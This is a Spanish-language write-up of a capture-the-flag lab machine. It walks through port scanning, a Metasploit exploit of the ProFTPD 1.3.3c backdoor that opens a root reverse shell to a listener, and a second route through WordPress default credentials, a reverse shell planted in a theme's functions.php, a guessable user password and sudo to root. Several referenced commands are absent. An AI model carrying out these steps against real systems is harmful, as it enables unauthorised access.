Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:57 EDT
Nmap scan report for 192.168.5.173
Host is up (0.00068s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:A7:30:B0 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.03 seconds
Metasploit
Si vamos a metasploit y vemos si tiene alguna vulnerabilidad el ftp veremos que si la tiene, por lo que haremos lo siguiente...
Dentro del entorno de metasploit haremos lo siguiente...
Info:
Con esto abremos conseguido acceso a la maquina y ya no solo eso, si no que seriamos root automaticamente...
Segunda forma de resolucion
Gobuster
Info:
Si nos vamos a /secret vemos que hay un Wordpress por lo que haremos lo siguiente...
Info:
Por lo que vemos nos saco el usuario admin, por lo que haremos lo siguiente...
Antes de nada si probamos las credenciales por defecto que vienen en Wordpress que son User = admin y Password = admin entrariamos, pero si queremos tirar de herramientas, seria con el siguiente comando...
Info:
Por lo que vemos las credenciales como bien dije antes son las de por defecto...
Una vez dentro del Wordpress nos vamos a la pestaña Themes y en la casilla Editor dentro de este entorno veremos un archivo para editar llamado Functions.php el cual inyectaremos una Reverse Shell de la siguiente manera...
Una vez inyectado esto, le damos a guardar los cambios al boton Update File y estando a la escucha anteriormente...
Cuando le demos a guardar automaticamente se nos creara una Shell con el usuario www-data, por lo que la sanitizaremos...
Descubrimos un usuario llamado marlinspike si probamos a cambiarnos a ese usuario utilizando como contraseña el mismo nombre de usuario seremos ese usuario...
Una vez siendo este usuario, si hacemos sudo -l veremos lo siguiente...
Vemos que tenemos todos los privilegios por lo que si hacemos...
Seremos root y con esto ya habriamos terminado la maquina...
[*] Started reverse TCP double handler on 192.168.5.162:4444
[*] 192.168.5.173:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0PGACgf43119N3Fp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0PGACgf43119N3Fp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.5.162:4444 -> 192.168.5.173:47528) at 2024-06-07 10:02:25 -0400
whoami
root
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
User = marlinspike
Password = marlinspike
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL